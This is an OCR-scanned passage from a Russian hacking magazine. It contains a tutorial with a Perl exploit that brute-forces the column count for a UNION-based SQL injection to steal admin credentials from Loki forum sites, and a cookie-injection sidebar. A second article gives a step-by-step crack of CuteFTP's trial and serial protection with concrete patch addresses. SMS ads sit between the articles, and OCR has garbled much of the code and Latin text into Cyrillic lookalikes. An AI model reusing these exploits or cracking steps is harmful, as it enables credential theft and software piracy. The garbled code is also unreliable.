ма в том, что кода программы у нас перед глазами нет, и решить эту проблему можно 
лишь прямым перебором: мы будем пытаться выбрать одно поле, если возникает ошиб- 
ка, будем увеличивать число полей на единицу до тех пор, пока ошибка не перестанет 
появляться. Стоит ли говорить, что эту задачу очень легко автоматизировать — и мы сде- 
лаем это в процессе создания универсального сплойта для І_окі. 

Но вернемся к таиландскому ресурсу. Методом ручного подбора я пришел к тому, что 
лучше всего реализовывать ЗОІ_-іпіесііоп следующим образом: 

сайпк).азр?саІ=' ипіоп зеіесі 1 ,разз,изег,1 ,1 ,1,1 ,1,1 ,1 ,1 ,1 ,1 {гот ШІАсІт 
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[ХАКЕР 07 [79] 05 > ВЗЛОМ 059 




ХАКЕР 07 [79] 05 > ВЗЛОМ 060 




Как легко видеть, внедряемый запрос выбирает 13 полей, при 
этом оригинальный запрос не возвращает записей, а вводимое 
предложение получает имя админской записи и соответствую- 
щий пароль (в І_окі он вообще никак не криптуется). Казалось бы, 
все круто, мы нашли универсальную отмычку. Однако это не сов- 
сем так: когда я решил попробовать собранный запрос на дру- 
гом ресурсе, меня постиг облом — опять количество полей не 
совпадало. По всему выходило, что, в зависимости от настроек 
(или версии), система выбирает различное число полей из табли- 
цы. Таким образом, чтобы написать универсальный эксплойт, не- 
обходимо реализовать в нем подбор числа выбираемых полей. 

[пишем сплоит] Ну, вот мы и пришли к самому интересному — сей- 
час напишем сплоит для І_окі :). Под «сплоитом» я понимаю прог- 
рамму, которая возьмет на себя всю механическую работу по 
взлому сервера: ей нужно лишь передать адрес ресурса и путь к 
уязвимому скрипту. Она сама проведет ЗОЫпіесііоп, вытащит ло- 
гин с паролем из потока вывода и покажет его пользователю. Пер- 
вый вопрос, который должен у тебя возникнуть, — на каком языке 
мы будем писать? Ответ прост, как два байта: на РегГе, потому что 
это быстро и удобно. Вообще, работа подобных сплойтов делит- 
ся на несколько основных этапов: 

Ш получение определяемых пользователем параметров 
[Ц соединение с указанным узлом 
® составление и отправка НТТР-запроса 
И обработка возвращаемой информации. 

В нашем случае, поскольку нам сначала необходимо составить 
корректный $ОІ_-запрос, пункты 2 — 4 будут выполняться многократ- 
но. Первый запрос, который мы отправляем, выбирает из таблицы 
10 полей (начинать перебор с 1 поля нет смысла). Если при его вы- 
полнении возникает ошибка (число колонок в оригинальном зап- 
росе другое), мы добавляем еще одно поле к нашему запросу. 
И так до тех пор, пока запрос не выполнится корректно. 

Если ты внимательно читаешь, у тебя должен был появиться вопрос: 
каким образом можно понять, выполнился ли корректно наш зап- 
рос, или же произошла ошибка. Очень легко! Если ты посмотришь 
код сплоита, который находится чуть ниже, то увидишь там строку, 
где я проверяю, есть ли в ответе сервера набор символов ІпіегпаІ 
Зегѵег Еггог. Если эта строка присутствует, считается, что запрос не 
выполнен, и надо увеличивать число выбираемых полей. 
Справедлив вопрос: а во всех ли случаях при возникновении ошиб- 
ки \л/еЬ-сервер выплевывает именно эту фразу? Справедливый от- 
вет: нет, это зависит от установленного \л/еЬ-сервера и версии А5Р. 
Так, модница А5Р .ІМЕТ ругается по-новому: «ОаіаЬазе Епдіпе еггог» 
— это предложение так же обрабатывается моим сплоитом. 

[наш нехитрый сплоит] 

#!/и5г/Ьіп/регІ 
изе ІО::5оскеі; 

$Іпо5І = $АРСѴ(0); 

$ра1Ті = $АРСѴ(1); 

$рогі=80; 

$5е="еггог_осс"; 

$і=0; 

\л/ІпіІе($5е=~/еггог_осс/) { 

зоскеКЗОСК, РЕ_ІІ\ІЕТ, ЗОСК_5ТРЕАМ, деіргоіоЬупате(Тср')); 
Зіасісіг = іпеТ_аТоп($Іпо5Т); 

Зрасісіг = зоскасІс1г_іп($рогі, Зіасісіг); 
соппесКЗОСК, $рабсІг); 

$диезі="СЕТ 

$раікі/саііп1 : о.а5р?саі= І %20ипіоп 0 /о205еІесі%201 ,раз5,изег, 1,1,1 

, 1 , 1 , 1 , 1 "; 

Тог($і=0; $і<$і;$і++) { 

$диезі.=",1"; 

} 

$диезі.="%201 : гот7о20іЫАсІпп"; 

$диезі.=" НТТР/1.1\п"; 

$диезі.="Нозі: $кюзі\п\п\г\п\п"; 
зепсі (ЗОСК, $диезі, 0); 

$зе="по_еггог"; 

\л/ІпіІе($сІаТа=<50СК>) { 

($сІаТа=~/ІпТегпаІ Зегѵег Еггог/ ог $сІаіа=~/ОаіаЬазе Епдіпе 
еггог/) { 

$зе="еггог_осс";}} 




[вот так в документ вставляются выбираемые параметры] 



сІозе(ЗОСК); 

$і++; } 

ргіпі "(+)ОріітаІ питЬег о? рагатз ІюипсІ: ".$к."\п"; 

[соблюдай очередность!] После того, как запрос составлен, 
можно уже переходить к анализу возращенной страницы: внутри 
нее лежит имя пользователя и пароль из таблицы іЬІАбт. Как же 
получить доступ к этой информации, как отличить пароль от каких- 
то левых символьных данных, которых полно на странице? 

Дело в том, что даже на различных сайтах, с различным количест- 
вом информации, разным дизайном и т.д., при определенном по- 
рядке выбираемых полей можно добиться того, что интересующие 
поля поместятся в такое место ЫттпІ-документа, где их легко можно 
будет опознать. К примеру, в запросе зеіесі 1,разз,изег, 1,1, 1,1, 1,1,1 
такая очередность выбрана неслучайно: в этом случае выбирае- 
мые параметры помещаются в следующую конструкцию: 

<а I^^еЬ"ЛIеіпЬ.азр?ЛIе^сМ^апкіI^а ,, сІаз5= ,, Іагде"Ягапк</а> 

Здесь ІтапкіРа — пароль пользователя Ітапк. Само собой, что та- 
ких ссылок в НітІ-документе больше нет, и поэтому двумя строчка- 
ми кода из горы текста выдирается именно этот тег. Получить раз- 
дельно логин и пароль — это уже дело техники, причем реализо- 
вать это можно многими путями. На самом деле, я тебе сообщил 
ргооПоПсопсері дальнейших действий и предоставляю возмож- 
ность самому немного попрограммировать. В самом деле, если 
тебе интересно попробовать собственные силы, допиши приве- 
денный здесь сплоит. Если же у тебя возникнут проблемы, на на- 
шем диске ты найдешь завершенный вариант отмычки, с краси- 
вым выводом, проверками на некорректное использование и т.д. 

[только юбочка помялась] Ну вот, по большому счету, и все. Мы с 
тобой написали эксплойт для І_окі, который, используя ЗОЫпіес- 
ііоп, крадет из базы данных пользовательскую информацию. 
В настоящий момент все серверы, на которых установлена І_окі — 
уязвимы. Однако, я думаю, ты проявишь благоразумие и твои 
действия не выйдут за рамки юного исследователя, верно? :) © 



[ПОДСТАНОВКА ПАРАМЕТРОВ В СООКІЕЗ] 

Частенько бывает так, что программист настойчиво 
фильтрует все данные, передаваемые пользовате- 
лем через ѲЕТ- и РОЗТ-запросы. Ну, в самом деле, 
вокруг полно хакеров, все только и ждут ошибки, 
чтобы трахнуть программу. Но при этом кодеры 
забывают осуществлять полноценную проверку 
информации, получаемой из пользовательских кукисов: 
ведь эти данные устанавливает само приложение, 
они не лежат на поверхности и сразу не всем прихо- 
дит в голову, что через них с таким же успехом мож- 
но осуществлять ѵѵеЬ-атаки. Однако каким образом 
можно эмулировать установленные кукисы при рабо- 
те со скриптом из программы-сплоита? Очень легко! 
Ответ лежит в спецификации протокола НТТР: 

ОЕТ /зсгірі.рИр НТТР/1.1 
Нозі: Иозі.ги 

Соокіе: соокѵаг=соокѵаІие 

Такой запрос пересдаст скрипту Іюзі.ги/зсгірі.ріір кукис 
соокѵаг со значением соокѵаіие. 





ЕРВИС 



Хочешь фирменный лого на свой сотовый? 

^ Пришли код логотипа (к примеру, "1001") на номер 4446 . 



Хочешь узнать, что значит термин? 



Пришли код термина (к примеру, "ѵѵОООГ) на номер - 




(код ѵѵОООІ) 
(код ѵѵ0002) 
(код ѵѵОООЗ) 
(код ѵѵ0004) 
(код ѵѵОООб) 
(код ѵѵОООб) 
(код ѵѵ0007) 
(код ѵѵ0008) 
(код ѵѵ0009) 
(код ѵѵООЮ) 
(код ѵѵООІІ) 
(код ѵѵ0012) 
(код ѵѵООІЗ) 
(код ѵѵ0014) 
(код ѵѵООІб) 
(код ѵѵООІб) 
(код ѵѵ0017) 
(код ѵѵ0018) 
(код ѵѵ0019) 
(код ѵѵ0020) 
(код ѵѵ0021) 
(код ѵѵ0022) 
(код ѵѵ0023) 
(код ѵѵ0023) 
(код ѵѵ0025) 
(код ѵѵ0026) 
(код ѵѵ0027) 
(код ѵѵ0028) 
(код ѵѵ0029) 
(код ѵѵООЗО) 
(код ѵѵ0038) 
(код ѵѵ0040) 
(код ѵѵ0041) 
(код ѵѵ0042) 
(код ѵѵ0043) 
(код ѵѵ0044) 
(код ѵѵ0045) 
(код ѵѵ0047) 
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Пришли свои термины на номер 4445 в виде 98 
іегтіпі (например “98 баг"). Не более 160 
символов латиницей или 70 кириллицей. 



маршрутизация 
шина 

интерпретатор 
окружение 
кластер 
степпинг 
трафик 
транслятор 
верификатор 
спам 
офшор 
крякер 
бета 
скин 

сертификация 
аутсорсинг 
баннер 
локализация 
тестер 
дамп 
стек 

исключение 
мидлет 
обфускатор 
документация 
поток 

хэширование 
браузер 
инсталятор 
реестр 
аккаунт 
домен 
девелопер 
Флуд 

пиктограмма 
архиватор 
экспозиция 
стробоскоп 



ѵѵ0077) 

ѵѵ0078) 

ѵѵ0079) 

\л/0080) 

ѵѵ0081) 

ѵѵ0088) 

ѵѵ0089) 

ѵѵ0092) 

ѵѵ0093) 

ѵѵ0094) 

ѵѵ0095) 

ѵѵ0096) 

ѵѵ0097) 

ѵѵ0098) 

ѵѵ0099) 

N0100) 

N0101) 

\л/0102) 

N0103) 

ѵѵ0104) 

N0105) 

N0106) 

ѵѵ0107) 

ѵѵ0108) 

ѵѵ0109) 

N0110) 

N0111) 
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Подробности: ѵѵѵѵѵѵ.і-Тгее.ги, (095) 916-7253, (812) 118-4575, $иррогІ@Игее.ги. Для заказа картинок включи услугу ѴѴАР/ОРРЗ-доступа в Интернет (оплачивается 
согласно твоему тарифному плану). Проверить возможность закачки можно, зайдя на ѵѵар-сайт Шр://4446.ш. В случае ошибки уточни настройки в службе 
поддержки твоего оператора. Стоимость запроса на номер 4444 - $0,30 без учета налогов, на номер 4445 - $0,60 без учета налогов, на номер 4446 - $0,90 без 
учета налогов, на номер 4449 - $3,00 без учета налогов. В случае ошибочного запроса услуга считается оказанной. 


















ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВРШМ НЬЮСЫ 




В ОСНОВНОМ ПОПУЛЯРНЫЙ 
СОФТ РАСПРОСТРАНЯЮТСЯ 
ПО ПРИНЦИПУ ЗНАВЕѴѴАВЕ: 
ТЫ СКАЧИВАЕШЬ ПРОГРАМ- 
МУ, НО МОЖЕШЬ ИСПОЛЬЗО- 
ВАТЬ ЕЕ В ОГРАНИЧЕННОМ 
РЕЖИМЕ ИЛИ ОГРАНИЧЕН- 
НОЕ ВРЕМЯ. ПОСЛЕ ИСТЕЧЕ- 
НИЯ ТВІАЬ-СРОКА ТЕБЯ ПРО- 



СЯТ ЗАРЕГИСТРИРОВАТЬ 
СОФТ. ДОБРОПОРЯДОЧНЫМ 
ГРАЖДАНАМ, ЗАРАБАТЫВАЮ- 
ЩИМ ПО $50К В ГОД, ПОЛАГА- 
ЕТСЯ ЗАПЛАТИТЬ ДЕНЕЖКУ И 
ПОЛЬЗОВАТЬСЯ СОФТИНОЙ 
БЕЗО ВСЯКИХ ОГРАНИЧЕ- 
НИЙ. НО МЫ-ТО С ТОБОЙ 
НЕМНОГО ДРУГИЕ, ПРАВДА? 



ПОЭТОМУ СЕГОДНЯ Я ПОДЕ- 
ЛЮСЬ СОКРОВЕННЫМ — 
РАССКАЖУ О ТОМ, КАК АЛЬ- 
ТЕРНАТИВНЫМ ОБРАЗОМ 
МОЖНО ИЗБАВИТЬСЯ ОТ 
ТВІАЬОГРАНИЧЕНИЙ И СДЕ- 
ЛАЮ ЭТО НА ПРИМЕРЕ ПОПУ- 
ЛЯРНОГО РТР-КЛИЕНТА 

СІІТЕРТР I ЕООіЗТ/ТЗРІп (едоізТ_ТзгІп@Ьк.ги) 





Советую поставить все 
галки в настройках Ольки 
Орііопз -> йеЬиддіпд 
орііопв на вкладке 
Ехсерііопз. 




Рассылка Калашникова: 
шшш.каІазІіпікоК.ги 
Информацию по 
исследованию ПО можно 
получить на этом сайте: 
шѵѵѵѵ.сгаскІаЬ.ги 



На диске ты найдешь 
полные версии программ, 
описанных в этой статье, а 
также исходники патча. 

Описанные действия 
попадают под действие 
статей 273 и 146 УК РФ, а 
/ I \ статья эта написана 
исключительно в 
образовательных целях. 
Изучай программы, но не 
нарушай закон! 



\ I / 





Лекарство для СиІеРТР 



Освобождаем любимый 
софт от назойливого ІгіаІ 



[кто такие крякѳры?] Прежде всего, 
хочу развеять мифы о крякерах. Во 
многих книгах о хакерах пишут, что 
крякер — это не кто иной, как «пло- 
хой» хакер, ворующий какую-либо 
информацию в корыстных целях и т.п. 
Наверное, опираясь на Словарь 



Жаргона Э.С. Раймонда: «А таіі- 
сіоиз тесісііег \л/По ігіез іо сіізсоѵег 
зепзіііѵе іпіогтаііоп Ьу рокіпд агоипсі. 
Непсе 'раззмогсі Паскег 1 , 'пеі\л/огк 
Паскег 1 . ТПе соггесі іегт із {сгаскег}». 
Во-первых, крякер ничего не ворует. 
Это не его профиль. Он исследует 



систему защиты и производит после- 
дующую нейтрализацию, «указывая» 
на ошибки разработчикам. Во-вто- 
рых, крякеры не продают своих «тво- 
рений». Конечно, есть так называе- 
мые «коммерческие заказы», но сог- 
лашаться на них или нет, каждый ре- 









Вот ссылки на основной софт: 

СиіеЕТР: ШрУ/дІоЬаІзсаре.сот/сІошпІоасІз/сиШір.азр 
ЮА : и/и/и/. сіаіаге5сие.Ье/ісіасіето/ісіасіето48.ехе 
ОІІуРЬд: и/и/ и/. сгаскІаЬ . ги/бо шпіоа гі/деі.рйр ?д=72 
НіЕУѴ: Ыф://\л/еЫі05і.кетіеІ.ги/~5еп/ЯІе5/Ме ш32с!ето .іір 
РЕ Ехріогег: ЫірУ/Ііеа ѵепіооіз . сот/сіо шпіоасі/рехзеіир . ехе 
МА8М32: ШрУ/жвт.ги/Ъаіхабо .рйр ?тобе=іооІ&іб=48 
ВоЯІсе: \л/\л/\л/.питеда.сот 



шает сам, и при этом ничто не 
афишируется. А те тысячи постов 
в инете о продаже крякнутого 
софта иначе как пиратством наз- 
вать нельзя, на мой взгляд. Да, я 
против пиратства. В наше время 
цены на софт становятся не таки- 
ми уж и высокими, и купить себе 
почтовый клиент (да и ОС тоже) 
может позволить почти каждый, у 
[истек ігіаі-срок? Не беда!] кого есть компьютер. 

[типы защит] Существует несколько типов защит. При использова- 
нии первого типа в программе присутствует одна функция про- 
верки, которая вызывается много раз и отключается просто моди- 
фикацией самой функции. Вторая — более «умная», при которой 
код проверки размазан по всему приложению и приходится дол- 
го искать и локализовать главные участки защиты. Обычно проб- 
лема решается написанием кейгена, поскольку в противном слу- 
чае приходится патчить слишком большие куски кода. Все осталь- 
ные типы защит — это протекторы сторонних фирм. Такая защита 
обходится снятием протектора, внедрением кода патча в тело за- 
щищенной программы или написанием кейгена, если не исполь- 
зуются алгоритмы самого протектора (хотя и в этом случае быва- 
ют исключения). 

[вооружение] Перед тем как приступать к работе, нужно расска- 
зать о том, что для нее потребуется. Понадобятся навыки прог- 
раммирования и знание азов ассемблера. Их можно почерпнуть 
из рассылки Калашникова: "Ассемблер? Это просто! Учимся 
программировать". В этой статье описывать все инструкции ассе- 
мблера бессмысленно — просто не хватит места, поэтому я буду 
ориентироваться на подготовленную аудиторию. Думаю, двух 
статей из нашего азпп-кодинга должно хватить :). 

Также для успешного взлома понадобятся следующие инструменты: 




срок? Требуется ли регистрация серийника на сервере произ- 
водителя? Ответы на все эти вопросы нужно получить для успеш- 
ного взлома, так как обойти защиту можно если только полностью 
разобраться с тем, как она работает. Ну что же, вперед! 

[в бой!] Я зашел на официальный сайт СиіеРТР и скачал послед- 
нюю версию клиента — 7.0.2. Сейчас мы ее раздраконим. Для 
начала нужно присмотреться к тому, как ведет себя софтина. При 
запуске она показывает наг с сообщением о том, что нам оста- 
лось 30 дней до окончания ігіаі. Переведем дату на годик вперед, 
чтобы убить ігіаі, запустим прогу, потом снова переведем назад, и 
при следующем запуске она ругнется на то, что ігіаі-период окон- 
чился. В принципе, нормальное поведение :). Если нажать на 
СІозе, то прога вскоре закроется. 

Окей, теперь можно приступать к главному. Запускаем ЮА, гру- 
зим в нее сиіеіір.ехе (Рііе -> Ореп іііе), и, пока она бегает по коду, 
мы поработаем в дебаггере. Запускаем сиіеіір, нажимаем Епіег 
ЗегіаІ ІМитЬег. В следующем окошке видим бокс, куда и вводим 
любую строку, взятую от балды. Жмем Ыехі, и нам говорят, что се- 
рийник не подходит. Ну что же, попытаемся убедить программу в 
обратном :). 

Нажимаем ОК, запускаем Ольку. Лезем в меню Еііе -> АііасЬ: по- 
явится список запущенных процессов, среди которых требуется 
найти сиіеіір и два раза кликнуть по нему. Софтина будет пере- 
ведена в режим паузы, и, чтобы продолжить ее выполнение, не- 
обходимо нажать Е9. 

В поставке с Олькой есть плагин СоттапсІ Ііпе — некое подобие 
командной строки в Зоііісе. Запустить его можно нажав АІі+ЕІ . Ес- 
ли следовать классическим представлениям о крякинге, то сей- 
час надо установить точку останова (далее — бряк, от слова 
Ьгеакроіпі) на вызов окошка об ошибке или на чтение текста из 
бокса. Но мы пойдем другим путем: поставим брейк на ѴѴіпАРІ- 
функцию чтения текста из окна 0еі\Л/іпсІо\л/ТехіА, что можно сде- 
лать командой Ьр Оеі\А/іпсІо\л/ТехіА. Если ты постоянный читатель 
рубрики «Кодинг», у тебя наверняка есть МЗЭІЧ загляни туда, что- 
бы получить информацию об АРІ-функциях \Л/іпсІо\л/5. 

Плагин СоттапсІ І_іпе поддерживает множество команд, узнать 
о которых можно набрав Ьеір. Я же выделю самые нужные: 

* Ьр [асісігезз] — ставит бряк на определенный адрес; 

* Ьс [асісігезз] — удаляет бряк; 

* б [асісігезз] — показывает в окне дампа памяти, что находится по 

данному адресу; 

* Ье/Ьг/Ьѵѵ [асісігезз] — ставят железные (Ьагбѵѵаге) бряки на испол- 
нение, чтение, запись по адресу соответственно. 



* РЕ Ехріогег («Пексплорер») — потрошил ка ресурсов; 

* НіЕѴѴ («Хью») — шестнадцатеричный редактор, дизассемблер; 

* ЮА («Ида») — мощнейший дизассемблер; 

* ОІІуОЬд («Олька») — легкий и функциональный дебаггер. 

Я думаю, большинство читателей представляют себе, что такое ди- 
зассемблер и дебаггер. Но для знойных танкистов поясню подроб- 
нее. Дизассемблер преобразует машинный код (в который компи- 
лируются программы) в читабельный вид, а точнее в исходник низ- 
коуровневого языка — ассемблера, для дальнейшего изучения. 
Дебаггер, собственно, нужен для отлаживания программы и вылав- 
ливания в ней всякого рода ошибок. Он позволяет в интерактивном 
режиме следить за выполнением программы, отлавливать вызовы 
определенных функций, смотреть содержимое указанных облас- 
тей памяти и регистров. По ходу статьи ты научишься пользоваться 
этим софтом, а я буду давать необходимые комментарии. 

Если ты читаешь наш журнал, то, наверное, со словом «крякинг» у 
тебя ассоциируется софтина Зоііісе от компании ІЧитеда. Так вот, 
использовать этот отладчик мы не будем в силу постоянно возника- 
ющих проблем при его установке новичками. По этому поводу есть 
тонны документации в инете, так что если интересно, загляни на 
наш диск или перейди по ссылкам, указанным в конце статьи. 

[общие принципы] Каким же образом взламываются ігіаі-прог- 
раммы? Самое главное в процессе крякинга — это разобраться 
с тем, как работает система ігіаі-ограничений. Лучший способ 
для этого — запустить программу в отладчике и внимательно изу- 
чать процесс ее выполнения. Какие функции вызываются при про- 
верке серийного номера? Каким образом они работают и как 
осуществляются валидации зегіаі-номера? Как проверяется ігіаі- 



Командой «Ьр 0еі\Л/іпсІо\л/ТехіА» мы поставили бряк на 
0еі\А/іпсІо\л/ТехіА. Жмем в СиіеЕТР ІЧехі и вываливаемся в ОІІу. Чтобы 
выйти из ѴѴіпАрі-функции, нажимаем СІГІ+Е9 — курсор встанет на 
инструкции геіп ОС. Это инструкция возврата из функции. В дебагге- 
рах инструкции можно выполнять пошагово и наблюдать за изме- 
нениями (в этом и есть их преимущество). Бряк, который мы устано- 
вили, нам больше не понадобится, поэтому удаляем его командой 
Ьс 0еі\Л/іпсІо\л/ТехіА. Идем по коду, нажимая Е8, пока не выйдем из 
функции. Сразу после этого мы оказываемся в другом блоке кода, 
и аналогичным образом пробираемся к выходу, нажимая СІГІ+Е9. 
Здесь идет сравнение регистра еах с нулем: іезі еах, еах, далее 
Іе 0046ес06 — осуществляется прыжок на 0046ес06, если еах ра- 
вен нулю, или просто дальше по коду, если нет. Проходим до 
0046еа46, тут в еах закидывают адрес введенного нами серийни- 
ка, посмотреть его можно командой Ь еах (только надо пройти на 
инструкцию дальше). В есх кидается (можно догадаться) длина 
серийника, сравнивается, опять же, с 0. Так как длина номера не 




[хакер 07 [79] 05 > ВЗЛОМ 063 ] 





равна нулю, мы прыгаем на 
0046еаЬ2 и ползем дальше. СаІІ 
00527793 загружает строку из 
ресурсов (если покопаться 
внутри, можно заметить вызов 
І_оасІ$ігіпдА). Далее в саІІ 
005098ЬЗ эта строка сравнивается с нашим серийником, и если 
они совпадают, то в еах возвращается 0, в противном случае — 
позиция в строке, с которой начинается несовпадение. А вот что- 
то интересное: саІІ 00476ЬГО, при этом перед ней в стек кладется 
наш серийник. Нажав Р7, заходим в процедуру. 




Еря | 



[командная строка в ОІІу] 



тоѵ [езр+ЗСІі+ѵаМО], 0 

саІІ зиЬ_472560 

Іеа есіх, [езр+ЗСН+ѵаг_20] 

ризіі ОЕІі 

Іеа еах, [езр+401і+ѵаг_1 0] 

ризіі есіх 

ризіі еах 

саІІ зігпістр 

асісі езр, 201і 

іезі еах, еах 

рор езі 

\п т. зИогІ Іос_476С8В 



; 5іге_1 

; сііаг * 
; сііаг * 



іі І5ігІеп('ахинея')==14 .. :) 



Сейчас самое время развернуть ЮА и попутно заглядывать в нее. 



тоѵ 


есіх, [езр+201і+агд_4] 


Чтобы перейти на какой-нибудь адрес в ЮА, нужно нажать 0. До 


ризіі 


есіі 


вызова саІІ зТгирг наш серийник копируется в буфер, а потом 


тоѵ 


есіі, есіх 


посредством зігирг все символы переводятся в верхний ре- 


ог 


есх, ОРРРРРРРРІі 


гистр. Далее заходим в зиЬ_4726еО: 


хог 


еах, еах 






тоѵ 


[езр+241і+ѵаг_12], 0 


іі зегіаІ[0] == 'А' 


герпе зсазЬ 


тоѵ 


есіі, [езр+агд_0] 


поі 


есх 


хог 


езі, езі 


сіес 


есх 


стр 


Ьуіе ріг [есіі], 41 Іі 


тоѵ 


[езр+241і+ѵаг_2], 0 




зііогі Іос_4726Р2 


стр 


есх, ОЕІі 


рор 


есіі 


І п 2 


Іос_476С99 


хог 


еах, еах 






рор 


езі 


В самом начале длина серийника вычисляется и сравнивается 


геіп 





с 0Е (14 в десятичной системе). Нажимаем СІГІ+Р9, ставим бряк 
на вызов функции: Ьр 0046еаі5 и пускаем прогу, нажав Р9. Есте- 
ственно, выскакивает ошибка: мы ввели строку длиной больше 
14-ти символов. Теперь вводим 14-байтную ахинею, жмем ІЧехі 
и останавливаемся в Ольке на бряке. Заходим в функцию — 
серийник теперь ровно в 14 символов, так что проверку длины 
проходим без проблем и идем дальше. 

[проверка введенного серийника] 

тоѵ еах, [есіх] 
тоѵ есх, [есІх+4] 

тоѵ сіѵѵогсі ріг [езр+241і+ѵаг_20], еах 
тоѵ еах, [есІх+8] 
тоѵ [езр+24Іі+ѵаг_1С], есх 
тоѵ сх, [есІх+ОСРі] 

Іеа есіх, [езр+241і+ѵаг_20] 
ризіі езі 

ризіі есіх ; сііаг * 

тоѵ [езр+2СІі+ѵаг_18], еах 
тоѵ [езр+2СІі+ѵаг_14], сх 

саІІ зігирг 

Іеа еах, [езр+2СІі+ѵаг_20] 

ризіі еах 

саІІ зиЬ_4726Е0 

тоѵ езі, еах 

ризіі езі 

саІІ зиЬ_472300 

Іеа есх, [езр+341і+ѵаг_1 0] 

тоѵ есіі, еах 

ризіі есх 

ризіі езі 




Тут с самого начала проверяется первый символ серийника, и он 
должен быть равен "А" (0x41). Удаляем старый бряк Ьс 0046еаі5 и 
ставим новый Ьр 00476с44. Пускаем прогу, нажимая Р9, меняем 
зегіаі, чтобы первый символ был "А", и жмем ІЧехі. Далее в 
$иЬ_4723сІ0 идут всяческие преобразования серийника, а вот в 
зиЬ_472560 из всего этого генерится правильный код, который за- 
тем сравнивается в зігпістр. Таким образом, дойдя до 00476с6е 

и введя команду сі еах, мы увидим в окне дампа правильный номер 
:). Сравнение правильного и неправильного серийников в откры- 
том виде — это самая распространенная ошибка кодеров. 

Тут, казалось бы, надо остановиться и написать кейген, но давай 
посмотрим, что будет дальше. Запоминаем правильный зегіаі, ко- 
торый для тебя был сгенерирован «заботливым» кодером. Пуска- 
ем прогу по Р9, вводим новые данные, жмем ІЧехі. Ах да, сработа- 
ет установленный бряк. Сотрем его командой Ьс 00476с44 и опять 
нажмем Р9. О чудо! Программа приняла номер, однако радо- 
ваться еще рано. Софтина просит ввести инфу для верификации 
серийника. Оставь все как есть и жми ІЧехі. Тут происходит самое 
неприятное: программа начинает стучаться на сервер сІЬгедіз- 
ігаііоп.дІоЬаІзсаре.сопп, чтобы проверить введенный код. Ну что 
же, позволим ей подключиться к серверу и выполнить верифика- 
цию серийного номера. Разумеется, наш зегіаі не будет принят 
системой и возникнет уже знакомая ошибка, а программа поп- 
росит ввести другой номер. Не беда, сейчас это исправим! 
Конечно, тут можно поставить Ьіір-сервер с рЬр, написать несколь- 
ко строк в ответ на запрос проги и обмануть ее. Но автор предус- 
мотрел это: запрос передается в зашифрованном виде, и разгля- 
деть, каким образом он составляется, не так уж просто. Конечно, 
можно вычислить алгоритм шифрования и реализовать этот прием, 
но мы с тобой оставим эту экзотику для любителей и пойдем строго 
прямо, потому что иногда это единственный логический выход :). 

Отрубим наглый наг. Запустим Пексплорер, откро- 
ем в нем сіеіаиіі.іпд. Этот файл — не что иное, как 
обычная сІІГка с ресурсами, откуда программа гру- 
зит все нужные строки и диалоги, в том числе наг. 
Загрузили, жмем СігІ+К, переходим в папочку 
Эіаіод, запускаем поиск СігІ+Р, вводим «Епіег Зегіаі 
ІЧитЬег» и, запустив поиск, выпадаем прямо в наг. 
Запоминаем номер диалога, а именно 396. Для 
дальнейшего использования его надо перевести в 
шестнадцатеричную систему счисления. Для этого 
мы воспользуемся встроенным в винду калькулято- 
ром: запускаем саіс.ехе, вбиваем число 396 и пос- 
ле нажатия Е5 получаем результат: 01 8С. 

Теперь запустим Хью и откроем в нем сиіеіір.ехе. Пе- 
реходим в режим дизассемблера: Епіег два раза, за- 
тем Е7 столько же раз — запустится поиск ассемблер- 
ного кода по маске, вводим «*018с». Находит что-то по 





адресу 00445176, там вызывается МетогуАІІос (выделение куска 
памяти заданного размера). Явно что-то не то, ищем дальше. Про- 
пускаем еще один левый адрес и попадаем на 00474161. 

[инициализация нага] 

ризіі еЬх 
ризіі еЬр 
ризИ езі 
ризіі есіі 
тоѵ езі, есх 
ризіі еах 
ризіі 18СІ1 

тоѵ [езр+28іі+ѵаг_10], езі 

саІІ ??ОСОіаІод @ @ ОАЕ @ ІРАѴСѴѴпсІ @@@ 7 . 

тоѵ есх, ІрРіІеІМате 

Іеа еЬх, [езі+бСІі] 

хог есіі, есіі 

тоѵ [езр+20іі+ѵаг_4], есіі 

тоѵ [еЬх], есх 

тоѵ есіх, ІрРіІеІЧате 

Іеа еЬр, [езі+701і] 

Поднимемся к началу на 00474140 и переименуем функцию для 
наглядности. Ставим курсор на 00474140, жмем N и вводим новое 
название, например «ТгіаЮіаІод_Іпіі». Теперь посмотрим перекре- 
стные ссылки этой функции (х-ге0. Жми СгіІ+Х, выбирай первую 
строку и жмякай Ок. Если пролистать вверх, становится видно, что 
прога читает что-то из реестра. Встаем опять на начало уже этой 
функции и смотрим х-геР Перекрестный вызов всего один, на него 
и переходим, чуть выше видно странное сравнение стр еах, 
15260. Если тут побегать по коду, то в принципе, понятно, откуда 
взялось это число. Дело в том, что прога, проверяя свою зареган- 
ность, если проверка не увенчалась успехом, посылает себе со- 
общение ѴѴМ_СОММАІ\Ю с ѵѵРагат, равным 1526, после чего вы- 
летает наг. Сейчас мы локализуем место, где это происходит. 
Опять лезем в Хью и также ищем, только уже по маске «*1526». 
Нужное место как раз там, где вызывается РозіМеззадеА: 

[а не показать ли юзеру наг?] 

ризіі 0 ; ІРагапл 

ризіі 1526І1 ; ѵѵРагат 

ризіі ѴѴМ_СОММАІ\Ю ; Мзд 
ризіі есх ; ІіѴѴпсІ 

саІІ сІз:РозШеззадеА 

Ползем вверх в Иде, попутно поглядывая на код. На 0046ЬсІ74 вызы- 
вается функция проверки серийника, которая обнаружилась в де- 
баггере. Лезем в Хью, переходим на 0046Ьс95 (Е5 и надо сначала 
ввести точку, а потом адрес, так как это виртуальный адрес), надо 
поменять іе на ігтпр, жмем ЕЗ, Е2 — переход в режим ассемблиро- 
вания, меняем іе на іпгір, Епіег. Теперь, поскольку инструкция стала 
на один байт короче, нужно куда-то деть этот байт (в принципе, до- 
писывать дальше пор необязательно, так как он все равно не вы- 
полнится; это делается только для читабельности), пишем пор — 




[в процессе взлома программы] 



это «пустая» инструкция, которая не делает ничего. Закрываем 
ЕЭС, сохраняем изменения, нажав Е9, выходим и пытаемся запус- 
тить прогу. Ура, все сработало — нага больше нет :). От одной на- 
вязчивой гадости избавились, теперь возьмемся за красивости :). 
Прога уже не будет лезть в инет и проверять серийник, но все-та- 
ки зайди в Неір -> АЬоиі. Разве тебя устроит какой-то там 
Тетрогагу ІІзег? Ты потратил кучу времени, и об этом никто не уз- 
нает? Не бойся, сейчас все исправим :). Обычно (опять же можно 
сказать, что это распространенная ошибка) кодеры называют 
